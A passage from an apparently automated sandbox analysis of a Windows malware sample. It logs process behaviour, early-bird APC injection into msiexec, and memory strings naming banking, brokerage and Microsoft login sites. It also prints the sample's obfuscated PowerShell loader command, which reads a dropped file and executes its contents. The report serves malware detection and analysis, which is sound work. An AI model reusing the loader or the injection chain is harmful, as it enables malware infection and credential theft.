          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AED
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00402902 FindFirstFileW,1_2_00402902
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599884Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599100Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598889Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597573Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597466Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597233Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596998Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596770Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596545Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596417Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596086Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595984Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594547Jump to behavior
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2545108464.000000000994A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000006.00000002.2545108464.00000000099AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWLw.
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: powershell.exe, 00000003.00000002.1814890454.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: msiexec.exe, 00000006.00000002.2559960111.000000002693A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\rAntephialtic.exeAPI call chain: ExitProcess graph end nodegraph_1-3722
          Source: C:\Users\user\Desktop\rAntephialtic.exeAPI call chain: ExitProcess graph end nodegraph_1-3719
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3A80000Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$anskueliggres=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\kinestheses.tra';$sprrereglernes=$anskueliggres.substring(54058,3);.$sprrereglernes($anskueliggres)"
          Source: C:\Users\user\Desktop\rAntephialtic.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$anskueliggres=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\kinestheses.tra';$sprrereglernes=$anskueliggres.substring(54058,3);.$sprrereglernes($anskueliggres)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
